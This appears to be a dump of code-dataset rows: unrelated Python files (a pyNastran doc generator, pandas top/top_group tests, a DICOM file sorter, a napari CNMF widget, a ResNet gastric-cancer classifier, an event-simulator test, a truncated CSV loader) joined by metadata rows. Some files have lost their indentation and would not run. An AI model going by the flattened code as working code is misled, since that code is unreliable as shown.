'.tri', '.cntl', '.c3d', # cart3d
'.surf', '.tags', '.ugrid', '.bedge', # aflr
'.plt', # tecplot
'.p3d',
'.tex', '.bib', # latex
]
MAKE_FILES = True
def get_folders_files(dirname, skip_file_suffix=None, skip_directories=None):
"""
Return list of directories and files in a given tree path. By default discards:
* directories ".svn", ".idea", ".settings"
    * files that end with ".pyc", ".pyx", ".bdf"
"""
if skip_directories is None:
skip_directories = SKIP_DIRECTORIES
if skip_file_suffix is None:
skip_file_suffix = tuple(SKIP_FILE_SUFFIX)
dirname = os.path.join(dirname)
files = []
folders = []
for root, dirs, filenames in os.walk(dirname):
folders.append(root)
for filename in filenames:
if filename.endswith(skip_file_suffix):
continue
if 'test_' in os.path.basename(filename):
continue
files.append(os.path.join(root, filename))
#files += [os.path.join(root, filename) for filename in filenames
#if not filename.endswith(skip_file_suffix)]
dirs[:] = [d for d in dirs if not d in skip_directories]
#if len(dirs):
#print('root = %s' % root)
#print(dirs)
#print('------------------')
return folders, files
def get_classes_functions_in_file(py_filename):
with open(py_filename, 'r', encoding='utf8') as f:
lines = f.readlines()
function_list = []
class_list = []
for line in lines:
line = line.split('#')[0].rstrip()
if line.startswith('class '):
# class ASDF(object):
class_name = line.split('(')[0].split(' ')[1]
is_object = False
if '(object):' in line:
is_object = True
class_list.append((class_name, is_object))
elif line.startswith('def '):
function_name = line.split('(')[0].split(' ')[1]
if function_name.startswith('_'):
continue
function_list.append(function_name)
#for class_name in class_list:
#print(class_name)
return class_list, function_list
def get_pyfilenames():
folders, filenames = get_folders_files('../../pyNastran')
filenames_classes = []
for py_filename in filenames:
py_filename2, dot_path = get_location_filename_for_pyfilename(py_filename)
class_names, function_names = get_classes_functions_in_file(py_filename)
#for class_name, is_object in class_names:
#print(' %s (class)' % class_name)
#for function_name in function_names:
#print(' %s (function)' % function_name)
filenames_classes.append((py_filename, py_filename2, dot_path, class_names))
return filenames_classes
def get_location_filename_for_pyfilename(py_filename):
"""../../pyNastran/utils/nastran_utils.py -> pyNastran/utils/nastran_utils.py"""
    # Note: lstrip removes a *set* of characters, which is fine for the '../' prefixes used here
    path = py_filename.lstrip('../\\')
no_py = os.path.splitext(path)[0]
dot_path = no_py.replace('\\', '.').replace('/', '.')
#print(dot_path)
return path, dot_path
def filenames_to_rsts(filenames_classes, make_rsts=False):
for py_filename, py_filename2, dot_path, class_names in filenames_classes:
if not class_names:
continue
base_folder = os.path.dirname(py_filename2)
#print('%-20s %s %s' % (base_folder[:20], py_filename2, dot_path))
folder = os.path.join('rsts', base_folder)
if 'cards' in folder:
while not folder.endswith('cards'):
folder = os.path.dirname(folder)
if not os.path.exists(folder):
os.makedirs(folder)
rst_filename = os.path.join(folder, 'index.rst')
mode = 'w'
rst_lines = '.. toctree::\n\n'
if os.path.exists(rst_filename):
rst_lines = ''
mode = 'a'
for class_name, is_object in class_names:
create_rst_file_for_class(folder, dot_path, class_name, is_object)
print(' %s' % str(class_name))
#pyNastran.bdf.cards.aset
rst_lines += ' %s.%s\n' % (dot_path, class_name)
#print(rst_lines)
with open(rst_filename, mode) as rst_file:
rst_file.write(rst_lines)
def create_rst_file_for_class(folder, dot_path, class_name, is_object):
split_path = dot_path.split('.')
split_path[-1] += '.rst'
#rst_filename = os.path.join(*split_path)
dot_class_path = '%s.%s.rst' % (dot_path, class_name)
rst_filename = os.path.join(folder, dot_class_path)
#dirname = os.path.dirname(rst_filename)
#if not os.path.exists(dirname):
#os.makedirs(dirname)
lines = ''
if is_object:
lines = '%s\n' % class_name
lines += '%s\n' % (len(class_name) * '-')
lines += '.. autoclass:: %s.%s\n' % (dot_path, class_name)
lines += ' :inherited-members:\n'
lines += ' :members:\n'
#lines += ' :private-members:\n'
else:
lines = '%s\n' % class_name
lines += '%s\n' % (len(class_name) * '-')
lines += '.. autoclass:: %s.%s\n' % (dot_path, class_name)
lines += ' :show-inheritance:\n'
lines += ' :inherited-members:\n'
lines += ' :members:\n'
#lines += ' :private-members:\n'
#ASET
#----
#.. autoclass:: pyNastran.bdf.cards.bdf_sets.ASET
#:show-inheritance:
#:inherited-members:
#:members:
#:private-members:
#print(rst_filename)
if lines:
with open(rst_filename, 'w') as rst_file:
rst_file.write(lines)
def main():
if os.path.exists('rsts'):
shutil.rmtree('rsts')
filenames_classes = get_pyfilenames()
filenames_to_rsts(filenames_classes, make_rsts=False)
#py_filename = r'C:\NASA\m4\formats\git\pyNastran\pyNastran\bdf\cards\bdf_sets.py'
#get_classes_in_file(py_filename)
if __name__ == '__main__':
main()
| 35.487437
| 94
| 0.585387
| 864
| 7,062
| 4.543981
| 0.252315
| 0.041263
| 0.024452
| 0.024452
| 0.318136
| 0.226694
| 0.192053
| 0.147988
| 0.089913
| 0.089913
| 0
| 0.007029
| 0.254602
| 7,062
| 198
| 95
| 35.666667
| 0.738792
| 0.184792
| 0
| 0.107692
| 0
| 0
| 0.130519
| 0.007388
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053846
| false
| 0
| 0.038462
| 0
| 0.123077
| 0.015385
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1 | 0 |
ee139bfd29a89a7a4a5d77d7a8c7900ad5b256b6 | 4,650 | py | Python | tests/utils/postprocess/test_top.py | ToucanToco/toucan-data-sdk | 1d82b7112231b65f8a310327b6d6673d137b7378 | ["BSD-3-Clause"] | 9 | 2017-12-21T23:09:10.000Z | 2020-08-20T13:53:24.000Z | tests/utils/postprocess/test_top.py | ToucanToco/toucan-data-sdk | 1d82b7112231b65f8a310327b6d6673d137b7378 | ["BSD-3-Clause"] | 144 | 2017-11-24T17:23:02.000Z | 2022-03-28T02:34:15.000Z | tests/utils/postprocess/test_top.py | ToucanToco/toucan-data-sdk | 1d82b7112231b65f8a310327b6d6673d137b7378 | ["BSD-3-Clause"] | 5 | 2018-03-07T13:22:01.000Z | 2021-05-31T11:53:07.000Z |
import pandas as pd
from toucan_data_sdk.utils.postprocess import top, top_group
def test_top():
""" It should return result for top """
data = pd.DataFrame(
[
{'variable': 'toto', 'Category': 1, 'value': 100},
{'variable': 'toto', 'Category': 1, 'value': 200},
{'variable': 'toto', 'Category': 1, 'value': 300},
{'variable': 'lala', 'Category': 1, 'value': 100},
{'variable': 'lala', 'Category': 1, 'value': 150},
{'variable': 'lala', 'Category': 1, 'value': 250},
{'variable': 'lala', 'Category': 2, 'value': 350},
{'variable': 'lala', 'Category': 2, 'value': 450},
]
)
# ~~~ without group ~~~
expected = pd.DataFrame(
[
{'variable': 'lala', 'Category': 2, 'value': 450},
{'variable': 'lala', 'Category': 2, 'value': 350},
{'variable': 'toto', 'Category': 1, 'value': 300},
]
)
kwargs = {'value': 'value', 'limit': 3, 'order': 'desc'}
df = top(data, **kwargs).reset_index(drop=True)
assert df.equals(expected)
# ~~~ with group ~~~
expected = pd.DataFrame(
[
{'variable': 'lala', 'Category': 1, 'value': 150},
{'variable': 'lala', 'Category': 1, 'value': 100},
{'variable': 'lala', 'Category': 2, 'value': 450},
{'variable': 'lala', 'Category': 2, 'value': 350},
{'variable': 'toto', 'Category': 1, 'value': 200},
{'variable': 'toto', 'Category': 1, 'value': 100},
]
)
kwargs = {'group': ['variable', 'Category'], 'value': 'value', 'limit': -2, 'order': 'desc'}
df = top(data, **kwargs)
assert df.equals(expected)
def test_top_date_strings():
"""It should manage to use top if the column can be interpretated as date"""
df = pd.DataFrame(
{'date': ['2017-01-01', '2017-03-02', '2018-01-02', '2016-04-02', '2017-01-03']}
)
top_df = top(df, value='date', limit=2)
assert top_df['date'].tolist() == ['2016-04-02', '2017-01-01']
top_df = top(df, value='date', limit=3, order='desc')
assert top_df['date'].tolist() == ['2018-01-02', '2017-03-02', '2017-01-03']
top_df = top(df, value='date', limit=3, order='desc', date_format='%Y-%d-%m')
assert top_df['date'].tolist() == ['2018-01-02', '2017-01-03', '2017-03-02']
def test_top_date_strings_temp_column():
"""It should not change existing columns"""
df = pd.DataFrame(
{'date': ['2017-01-01', '2017-03-02'], 'date_': ['a', 'b'], 'date__': ['aa', 'bb']}
)
assert top(df, value='date', limit=2, order='desc').equals(df[::-1])
def test_top_group():
""" It should return result for top_group """
data = pd.DataFrame(
{
'Label': ['G1', 'G2', 'G3', 'G4', 'G5', 'G3', 'G3'],
'Categories': ['C1', 'C2', 'C1', 'C2', 'C1', 'C2', 'C3'],
'Valeurs': [6, 1, 9, 4, 8, 2, 5],
'Periode': ['mois', 'mois', 'mois', 'semaine', 'semaine', 'semaine', 'semaine'],
}
)
# ~~~ with filters ~~~
expected = pd.DataFrame(
{
'Periode': ['mois', 'mois', 'semaine', 'semaine', 'semaine'],
'Label': ['G3', 'G1', 'G5', 'G3', 'G3'],
'Categories': ['C1', 'C1', 'C1', 'C2', 'C3'],
'Valeurs': [9, 6, 8, 2, 5],
}
)
kwargs = {
'group': 'Periode',
'value': 'Valeurs',
'aggregate_by': ['Label'],
'limit': 2,
'order': 'desc',
}
df = top_group(data, **kwargs)
assert df.equals(expected)
# ~~~ without groups ~~~
expected = pd.DataFrame(
{
'Label': ['G3', 'G3', 'G3', 'G5'],
'Categories': ['C1', 'C2', 'C3', 'C1'],
'Valeurs': [9, 2, 5, 8],
'Periode': ['mois', 'semaine', 'semaine', 'semaine'],
}
)
kwargs = {
'group': None,
'value': 'Valeurs',
'aggregate_by': ['Label'],
'limit': 2,
'order': 'desc',
}
df = top_group(data, **kwargs)
assert df.equals(expected)
# ~~~ with group and function = mean ~~~
expected = pd.DataFrame(
{
'Periode': ['mois', 'mois', 'semaine', 'semaine'],
'Label': ['G3', 'G1', 'G5', 'G4'],
'Categories': ['C1', 'C1', 'C1', 'C2'],
'Valeurs': [9, 6, 8, 4],
}
)
kwargs = {
'group': ['Periode'],
'value': 'Valeurs',
'aggregate_by': ['Label'],
'limit': 2,
'function': 'mean',
'order': 'desc',
}
df = top_group(data, **kwargs)
assert df.equals(expected)
| 33.214286
| 96
| 0.476129
| 519
| 4,650
| 4.204239
| 0.208092
| 0.045371
| 0.070577
| 0.057745
| 0.711274
| 0.633364
| 0.508708
| 0.469753
| 0.425756
| 0.380843
| 0
| 0.078277
| 0.291183
| 4,650
| 139
| 97
| 33.453237
| 0.583738
| 0.065591
| 0
| 0.421053
| 0
| 0
| 0.277675
| 0
| 0
| 0
| 0
| 0
| 0.078947
| 1
| 0.035088
| false
| 0
| 0.017544
| 0
| 0.052632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1 | 0 |
ee14c24926c18fc83e37f709865f20c7c3816477 | 2,199 | py | Python | MoveRestructure.py | bsmarine/dicomConversionToNiftiHCC | ea8d4c922a299a2b9e1936bdb08c22d445e48db7 | ["BSD-3-Clause"] | 1 | 2021-06-25T17:13:37.000Z | 2021-06-25T17:13:37.000Z | MoveRestructure.py | bsmarine/dicomConversionToNiftiHCC | ea8d4c922a299a2b9e1936bdb08c22d445e48db7 | ["BSD-3-Clause"] | null | null | null | MoveRestructure.py | bsmarine/dicomConversionToNiftiHCC | ea8d4c922a299a2b9e1936bdb08c22d445e48db7 | ["BSD-3-Clause"] | 1 | 2021-07-08T22:27:57.000Z | 2021-07-08T22:27:57.000Z |
import sys
import os
import SimpleITK as sitk
import pydicom
from slugify import slugify
import shutil
import argparse
def gen_dcm_identifiers(in_dir):
    ## Get the absolute path of every file inside directories that contain .dcm files, recursively
    dcms_path_list = [os.path.abspath(os.path.join(dire, dcm)) for dire, sub_dir, dcms in os.walk(in_dir) if 'dcm' in str(dcms) for dcm in dcms]
##Output List
output_list = list()
## Generate List with MRN, Accession Number, Series Description, Series Number, Acq Date
for dcm_file in dcms_path_list:
        info = pydicom.dcmread(dcm_file)  # read_file is a deprecated alias for dcmread
try:
            mrn = info[0x0010, 0x0020].value
            acc = info[0x0008, 0x0050].value
series_desc = info[0x0008,0x103e].value
series_num = info[0x0020,0x0011].value
acq_date = info[0x0008,0x0020].value
string = str(series_desc)+"_"+str(series_num)+"_"+str(acq_date)
string_date = slugify(string)
output_list.append([mrn,acc,string_date,dcm_file])
except KeyError:
print ("Error getting metadata from "+str(dcm_file))
return output_list
def create_folders_move(dcm_ids,out_dir):
if os.path.exists(out_dir) == False:
os.mkdir(out_dir)
for i in dcm_ids:
print (i)
if os.path.exists(os.path.join(out_dir,i[0]))==False:
os.mkdir(os.path.join(out_dir,i[0]))
if os.path.exists(os.path.join(out_dir,i[0],i[1]))==False:
os.mkdir(os.path.join(out_dir,i[0],i[1]))
if os.path.exists(os.path.join(out_dir,i[0],i[1],i[2]))==False:
os.mkdir(os.path.join(out_dir,i[0],i[1],i[2]))
try:
shutil.move(i[3],os.path.join(out_dir,i[0],i[1],i[2]))
print ("######## Moving "+str(i[3]))
        except (shutil.Error, OSError):
            print("Error, likely file already exists in destination")
parser = argparse.ArgumentParser(description='MoveRestructureScript')
parser.add_argument("--dicomDir", dest="in_dir", required=True)
parser.add_argument("--outDir", dest="out_dir", required=True)
op = parser.parse_args()
create_folders_move(gen_dcm_identifiers(op.in_dir), op.out_dir)
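# Hedged usage note (not part of the original script); the paths below are
# illustrative placeholders:
#   python MoveRestructure.py --dicomDir /path/to/raw_dicoms --outDir /path/to/sorted
# Files are moved into <outDir>/<MRN>/<accession>/<series-desc_series-num_acq-date>/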
| 36.04918
| 141
| 0.622556
| 325
| 2,199
| 4.052308
| 0.295385
| 0.059226
| 0.060744
| 0.069096
| 0.167046
| 0.167046
| 0.167046
| 0.167046
| 0.167046
| 0.167046
| 0
| 0.038346
| 0.241019
| 2,199
| 60
| 142
| 36.65
| 0.750749
| 0.065939
| 0
| 0.044444
| 0
| 0
| 0.072754
| 0.010254
| 0
| 0
| 0.02832
| 0
| 0
| 1
| 0.044444
| false
| 0
| 0.155556
| 0
| 0.222222
| 0.088889
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1 | 0 |
ee1671d5719714f90ce4ce8110a4344a83fa25b3 | 2,384 | py | Python | mesmerize_napari/cnmf_viz_gui.py | nel-lab/mesmerize-napari | 24f0c92c0c78eecdd063c82fe6d5ff8f1179fc1b | ["Apache-2.0"] | 1 | 2022-01-11T16:18:17.000Z | 2022-01-11T16:18:17.000Z | mesmerize_napari/cnmf_viz_gui.py | nel-lab/caiman-napari-prototype | 24f0c92c0c78eecdd063c82fe6d5ff8f1179fc1b | ["Apache-2.0"] | 12 | 2022-01-11T16:21:01.000Z | 2022-02-17T04:43:50.000Z | mesmerize_napari/cnmf_viz_gui.py | nel-lab/mesmerize-napari | 24f0c92c0c78eecdd063c82fe6d5ff8f1179fc1b | ["Apache-2.0"] | null | null | null |
from PyQt5 import QtWidgets
from .cnmf_viz_pytemplate import Ui_VizualizationWidget
from .evaluate_components import EvalComponentsWidgets
from mesmerize_core.utils import *
from mesmerize_core import *
import caiman as cm
class VizWidget(QtWidgets.QDockWidget):
def __init__(self, cnmf_viewer, batch_item):
QtWidgets.QDockWidget.__init__(self, parent=None)
self.ui = Ui_VizualizationWidget()
self.ui.setupUi(self)
self.cnmf_obj = batch_item.cnmf.get_output()
self.batch_item = batch_item
self.cnmf_viewer = cnmf_viewer
self.eval_gui = EvalComponentsWidgets(cnmf_viewer=cnmf_viewer)
self.ui.pushButtonInputMovie.clicked.connect(self.view_input)
self.ui.pushButtonCnImage.clicked.connect(self.load_correlation_image)
self.ui.pushButtonViewProjection.clicked.connect(self.view_projections)
self.ui.pushButtonEvalGui.clicked.connect(self.show_eval_gui)
self.ui.pushButtonUpdateBoxSize.clicked.connect(self.select_contours)
def _open_movie(self, path: Union[Path, str]):
file_ext = Path(path).suffix
if file_ext == ".mmap":
Yr, dims, T = cm.load_memmap(path)
images = np.reshape(Yr.T, [T] + list(dims), order="F")
self.cnmf_viewer.viewer.add_image(images, colormap="gray")
else:
self.cnmf_viewer.viewer.open(path, colormap="gray")
def view_input(self):
path = self.batch_item.caiman.get_input_movie_path()
full_path = get_full_data_path(path)
self._open_movie(full_path)
def load_correlation_image(self):
corr_img = self.batch_item.caiman.get_correlation_image()
self.cnmf_viewer.viewer.add_image(
corr_img, name=f'corr: {self.batch_item["name"]}', colormap="gray"
)
def view_projections(self):
proj_type = self.ui.comboBoxProjection.currentText()
projection = self.batch_item.caiman.get_projection(proj_type=proj_type)
self.cnmf_viewer.viewer.add_image(
projection,
name=f'{proj_type} projection: {self.batch_item["name"]}',
colormap="gray",
)
def show_eval_gui(self):
self.eval_gui.show()
def select_contours(self):
box_size = self.ui.spinBoxBoxSize.value()
self.cnmf_viewer.select_contours(box_size=box_size, update_box=True)
| 38.451613
| 79
| 0.693792
| 300
| 2,384
| 5.233333
| 0.303333
| 0.063694
| 0.06242
| 0.050955
| 0.166879
| 0.094268
| 0.040764
| 0
| 0
| 0
| 0
| 0.000527
| 0.203859
| 2,384
| 61
| 80
| 39.081967
| 0.82666
| 0
| 0
| 0.04
| 0
| 0
| 0.042785
| 0.020973
| 0
| 0
| 0
| 0
| 0
| 1
| 0.14
| false
| 0
| 0.12
| 0
| 0.28
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1 | 0 |
ee2135f4afd77e09b1a2e652846d3ab3f3aa9ee1 | 3,642 | py | Python | model/gastric_cancer_ResNet_cnn.py | bd-z/Gastric_Biopsy_Cancer_Detector | fac18b6484ff10b09b50eb6d81af9984f9fe3019 | ["MIT"] | 1 | 2022-01-08T14:19:31.000Z | 2022-01-08T14:19:31.000Z | model/gastric_cancer_ResNet_cnn.py | bd-z/Gastric_Biopsy_Cancer_Detector | fac18b6484ff10b09b50eb6d81af9984f9fe3019 | ["MIT"] | null | null | null | model/gastric_cancer_ResNet_cnn.py | bd-z/Gastric_Biopsy_Cancer_Detector | fac18b6484ff10b09b50eb6d81af9984f9fe3019 | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 3 20:33:21 2021
@author: zhang
"""
import os
import numpy as np
import pandas as pd
import tensorflow as tf
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
import tensorflow.keras as keras
from tensorflow.keras.preprocessing import image
from tensorflow.keras import backend as K
from tensorflow.keras.callbacks import EarlyStopping
from tensorflow.keras.applications.resnet_v2 import ResNet50V2
from tensorflow.keras.models import Model, Sequential
from tensorflow.keras.layers import Flatten, Dense, Dropout, Conv2D, BatchNormalization, MaxPool2D ,Activation, MaxPooling2D
def data_table(folder):
    '''Create a dataframe with 'id' and 'label' columns. The id column is the path of each image,
    and the label column contains 1 or 0, indicating whether cancer cells are present.
    '''
p=os.walk(folder)
list_empty=[]
dict_empty={}
for path, dir_list,file_list in p:
for file_name in file_list:
file_path=os.path.join(path,file_name)
list_empty.append(file_path)
for file_path in list_empty:
if 'non_cancer' in file_path:
label=0
else:
label=1
dict_empty['{}'.format(file_path)]=label
df = pd.DataFrame.from_dict(dict_empty, orient='index',columns=['label'])
df = df.reset_index().rename(columns={'index':'id'})
df = shuffle(df)
return df
#folder where the images data stored
f=r'G:\BaiduNetdiskDownload\train'
df_full=data_table(f)
#define X and y
X=df_full['id']
y=df_full['label']
# train and test split
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state = 100) # split into test and train sets
def slice_load(file_list):
''' load the images'''
images=[]
for filename in file_list:
im = image.load_img(filename,target_size=(512, 512, 3))
b = image.img_to_array(im)
images.append(b)
return images
X_train_image=slice_load(X_train)
X_train_array=np.array(X_train_image)/255
X_test_image=slice_load(X_test)
X_test_array=np.array(X_test_image)/255
X_train_array.shape
type(y_train)
#clear sessions
K.clear_session()
input_shape = (512, 512, 3)
# transfer learning with ResNet50V2
resMod = ResNet50V2(include_top=False, weights='imagenet',
input_shape=input_shape)
# freeze the layers in ResNet50V2
for layer in resMod.layers:
layer.trainable = False
# build model
model = Sequential()
model.add(resMod)
model.add(tf.keras.layers.GlobalAveragePooling2D())
#1st Dense: (None, 60)
model.add(keras.layers.Dense(60, activation='relu'))
#regularization with penalty term
model.add(Dropout(0.2))
# 2nd Dense: (None, 50)
model.add(keras.layers.Dense(50, activation='relu'))
#regularization
model.add(keras.layers.BatchNormalization())
# 3rd Dense: (None, 50)
model.add(keras.layers.Dense(50, activation='relu'))
model.add(keras.layers.BatchNormalization())
# Output Layer: (None, 1)
model.add(keras.layers.Dense(1, activation='sigmoid'))
model.summary()
# Compile: binary_crossentropy matches the single sigmoid output unit
model.compile(loss='binary_crossentropy', optimizer='adam',
              metrics=['accuracy'])
#add early stoping
callback = EarlyStopping(monitor='val_loss', patience=3)
#(5)Train
results=model.fit(X_train_array, y_train, batch_size=64, epochs=50, verbose=1, \
validation_split=0.2,callbacks=[callback], shuffle=True)
model.evaluate(X_test_array, y_test)
results.history['val_accuracy']
#save model
model.save(r'C:\Users\zhang\GitHub_projects\GTBR\Gastric_Biopsy_Cancer_Detector\model\resnet_gastric.h5')
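# Hedged follow-up sketch (not in the original script): reloading the saved model
# for inference. The model_path argument is whatever was passed to model.save();
# the 0.5 threshold is an illustrative assumption for the sigmoid output.
def _example_reload_and_predict(model_path, X):
    from tensorflow.keras.models import load_model
    reloaded = load_model(model_path)
    probs = reloaded.predict(X)
    # Sigmoid probabilities -> binary cancer / non-cancer labels
    return (probs > 0.5).astype('int32')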
| 23.197452
| 124
| 0.720209
| 536
| 3,642
| 4.740672
| 0.375
| 0.028335
| 0.044864
| 0.044864
| 0.090516
| 0.042503
| 0.042503
| 0.042503
| 0.042503
| 0.042503
| 0
| 0.027988
| 0.166118
| 3,642
| 156
| 125
| 23.346154
| 0.808693
| 0.175178
| 0
| 0.054054
| 0
| 0
| 0.08098
| 0.048656
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027027
| false
| 0
| 0.175676
| 0
| 0.22973
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee245853feab4e3b1a6bbf63e986448df5eef06f
| 2,280
|
py
|
Python
|
esim_torch/test_single_pixel.py
|
Giamm9998/face_detection_on_sim_events
|
d0917a3fff9427f3b898834f37f7e5ff03c3c8e0
|
[
"MIT"
] | null | null | null |
esim_torch/test_single_pixel.py
|
Giamm9998/face_detection_on_sim_events
|
d0917a3fff9427f3b898834f37f7e5ff03c3c8e0
|
[
"MIT"
] | null | null | null |
esim_torch/test_single_pixel.py
|
Giamm9998/face_detection_on_sim_events
|
d0917a3fff9427f3b898834f37f7e5ff03c3c8e0
|
[
"MIT"
] | null | null | null |
import torch
import matplotlib.pyplot as plt
import numpy as np
import glob
import cv2
from esim_torch import EventSimulator_torch
def increasing_sin_wave(t):
return (400 * np.sin((t-t[0])*20*np.pi)*(t-t[0])+150).astype("uint8").reshape((-1,1,1))
if __name__ == "__main__":
c = 0.2
refractory_period_ns = 5e6
esim_torch = EventSimulator_torch(contrast_threshold_neg=c,
contrast_threshold_pos=c,
refractory_period_ns=refractory_period_ns)
print("Loading images")
timestamps_s = np.genfromtxt("../esim_py/tests/data/images/timestamps.txt")
images = increasing_sin_wave(timestamps_s)
timestamps_ns = (timestamps_s * 1e9).astype("int64")
log_images = np.log(images.astype("float32") / 255 + 1e-4)
# generate torch tensors
print("Loading data to GPU")
device = "cuda:0"
log_images = torch.from_numpy(log_images).to(device)
timestamps_ns = torch.from_numpy(timestamps_ns).to(device)
# generate events with GPU support
print("Generating events")
events = esim_torch.forward(log_images, timestamps_ns)
# render events
image = images[0]
print("Plotting")
event_timestamps = events['t']
event_polarities = events['p']
i0 = log_images[0].cpu().numpy().ravel()
fig, ax = plt.subplots(ncols=2)
timestamps_ns = timestamps_ns.cpu().numpy()
log_images = log_images.cpu().numpy().ravel()
ax[0].plot(timestamps_ns, log_images)
ax[0].plot(timestamps_ns, images.ravel())
ax[0].set_ylim([np.log(1e-1),np.log(1 + 1e-4)])
ax[0].set_ylabel("Log Intensity")
ax[0].set_xlabel("Time [ns]")
ax[1].set_ylabel("Time since last event [ns]")
ax[1].set_xlabel("Timestamp of event [ns]")
ax[1].set_xlim([0,3e8])
for i in range(-10,3):
ax[0].plot([0,timestamps_ns[-1]], [i0+i*c, i0+i*c], c='g')
event_timestamps = event_timestamps.cpu().numpy()
for i, (t, p) in enumerate(zip(event_timestamps, event_polarities)):
color = "r" if p == -1 else "b"
ax[0].plot([t, t], [-3, 0], c=color)
if i > 0:
ax[1].scatter([t], [t-event_timestamps[i-1]], c=color)
ax[1].plot([0,3e8], [refractory_period_ns, refractory_period_ns])
plt.show()
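# A small post-hoc summary (my addition, not in the original test): 'p' holds
# per-event polarity as a +1/-1 tensor, so counting each sign is one comparison.
num_pos = int((event_polarities == 1).sum().item())
num_neg = int((event_polarities == -1).sum().item())
print("events: %d positive, %d negative" % (num_pos, num_neg))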
| 33.043478
| 91
| 0.638158
| 340
| 2,280
| 4.082353
| 0.323529
| 0.07781
| 0.064842
| 0.017291
| 0.097983
| 0.051873
| 0
| 0
| 0
| 0
| 0
| 0.038631
| 0.205263
| 2,280
| 68
| 92
| 33.529412
| 0.727373
| 0.030263
| 0
| 0
| 0
| 0
| 0.094288
| 0.019492
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019608
| false
| 0
| 0.117647
| 0.019608
| 0.156863
| 0.078431
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee24a1450e91db84cc047da4850276c21c83ee5a
| 6,642
|
py
|
Python
|
load_csv.py
|
alexkchew/AppSciTools
|
7fff312115bd109a5391adff9e0f9cdec8ebbdab
|
[
"MIT"
] | null | null | null |
load_csv.py
|
alexkchew/AppSciTools
|
7fff312115bd109a5391adff9e0f9cdec8ebbdab
|
[
"MIT"
] | null | null | null |
load_csv.py
|
alexkchew/AppSciTools
|
7fff312115bd109a5391adff9e0f9cdec8ebbdab
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
load_csv.py
This script controls all CSV loading.
Created on: Fri Jul 16 15:54:43 2021
Author: Alex K. Chew (alex.chew@schrodinger.com)
Copyright Schrodinger, LLC. All rights reserved.
"""
# Loading modules
import os
import pandas as pd
import numpy as np
# Importing filtration tools
from .filtration import filter_by_variance_threshold
# Defining default columns
DEFAULT_INDEX_COLS = ["Title", "Entry Name"]
# Loading experimental data
def load_property_data(csv_data_path,
keep_list = []):
"""
This function loads property data from spreadsheet
Parameters
----------
csv_data_path: [str]
path to csv file
keep_list: [list, default = []]
list of columns to keep. If empty, the entire dataframe is returned.
Returns
-------
csv_data: [df]
dataframe containing csv information with the keep list
"""
# Loading dataframe
csv_data = pd.read_csv(csv_data_path)
# Checking if list is empty
if len(keep_list) == 0:
return csv_data
else:
return csv_data[keep_list]
# Function to load descriptor data
def load_descriptor_data(csv_path,
clean_data = True,
filter_by_variance = True,
output_filtered_data = False,
na_filter = 'remove',
default_index_cols = DEFAULT_INDEX_COLS):
"""
This function loads the descriptor information. Note that:
- non-numerical descriptors are removed automatically
- columns containing missing (NaN) values are removed automatically
Parameters
----------
csv_path : str
Path to csv file
clean_data: logical, default = True
True if you want to clean the data by removing non-numerical descriptors / NaN columns
output_filtered_data: logical, optional
True if you want to output the filtered data as a separate csv file.
The default value is False.
filter_by_variance: logical, optional
True if you want to filter by variance. By default, this is True.
na_filter: str, optional
Method of dealing with non-existing numbers. The different methods
are summarized below:
'remove': (default)
Remove all columns that have non-existing numbers.
'fill_with_zeros':
Fill all nans with zeros. It will also look for infinities and replace them
with zeros.
Returns
-------
output_df : dataframe
dataframe containing the loaded csv contents
"""
# Loading csv file
csv_df = pd.read_csv(csv_path)
# Printing
print("\nLoading CSV file: %s"%(csv_path))
# Checking if you want to clean the dataframe
if clean_data is True:
# Cleaning the dataframe
if na_filter == 'remove':
print("Removing all columns with nan's")
csv_df_nonan = csv_df.dropna(axis=1) # Removes NaN values
elif na_filter == 'fill_with_zeros':
print("Filling nan's with zeros")
csv_df_nonan = csv_df.fillna(0)
csv_df_nonan = csv_df_nonan.replace([np.inf, -np.inf], 0)  # replace() returns a copy
else:
raise ValueError("na_filter of %s is not defined!" % na_filter)  # fail fast instead of printing and crashing later
# Selecting only portions of the dataframe with numbers.
csv_df_nums = csv_df_nonan.select_dtypes(['number']) #
try:
# Removing cols with low variance
if filter_by_variance is True:
output_df = filter_by_variance_threshold(X_df = csv_df_nums)
else:
print("Skipping variance filtration for %s"%(csv_path))
